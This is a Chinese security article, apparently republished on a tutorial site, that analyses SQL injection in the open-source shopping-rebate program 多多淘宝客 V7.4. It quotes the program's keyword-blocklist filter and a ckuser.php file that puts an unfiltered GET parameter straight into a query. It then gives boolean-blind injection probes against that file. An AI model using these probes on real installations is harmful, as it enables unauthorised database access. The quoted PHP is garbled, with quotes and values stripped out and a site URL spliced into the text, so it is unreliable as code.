软件开发培训班 >> 网络技术 >> 网络安全
多多淘宝客V7.4绕过防注入及一个注入漏洞的分析 |
|
本文标签:多多淘宝客,绕过防注入,,一个注入漏洞 由于程序是开源程序 并下载其程序看了一番 。其实程序员还是有一点安全意识的: 防注入代码: 复制代码 代码如下://要过滤的非法字符 $ArrFiltrate = array ( "#union#i", "#<script#i", "#/script>#i", "#select#i", "#alert#i", "#javascript#i", "#<table#i", "#<td#i", "#\"#i", "#\#i", "#delete#i", "#vbscript#i", "#applet#i", "#frame#i", "#<div#i", "#update#i", "##i", "#union #i", "#select #i", "#delete #i", "#update #i", "#and #i", "#;#i", "#update#i" ); $replacements=; function FunStringExist(&$array,$ArrFiltrate,$replacements) { if (is_array($array)) { foreach ($array as $key => $value) { if (is_array($value)) FunStringExist($array[$key],$ArrFiltrate,$replacements); else $array[$key] = preg_replace($ArrFiltrate, $replacements, $value); } } } FunStringExist($_GET,$ArrFiltrate,$replacements); FunStringExist($_POST,$ArrFiltrate,$replacements); 这段代码多少还是有瑕疵的、只过滤www.jb51.net get post 我们只要找调用request的地方 别一个文件并没有调用防注入程序,导致字符注入、但受gpc影响 复制代码 代码如下:header("Content-Type:text/html;charset=utf-8"); include "../comm/config.php"; $uname = trim($_GET["name"]); if($uname==){ echo "true"; }else{ $con = @mysql_connect("$dbserver","$dbuser","$dbpass" )or die(ERR_DB); mysql_select_db("$dbname",$con)or die("can not choose the dbname!"); $query="select * from ".$BIAOTOU."user where ddusername=".$uname.""; mysql_query("set names utf8"); $res=mysql_query($query); if(mysql_num_rows($res)!=0) {echo "true";} else {echo "false";} } 首先注册一个用户.让程序能过判断 ckuser.php?name=maxadd and 1=1 and = 返回true ckuser.php?name=maxadd and 1=2 and = 返回false |
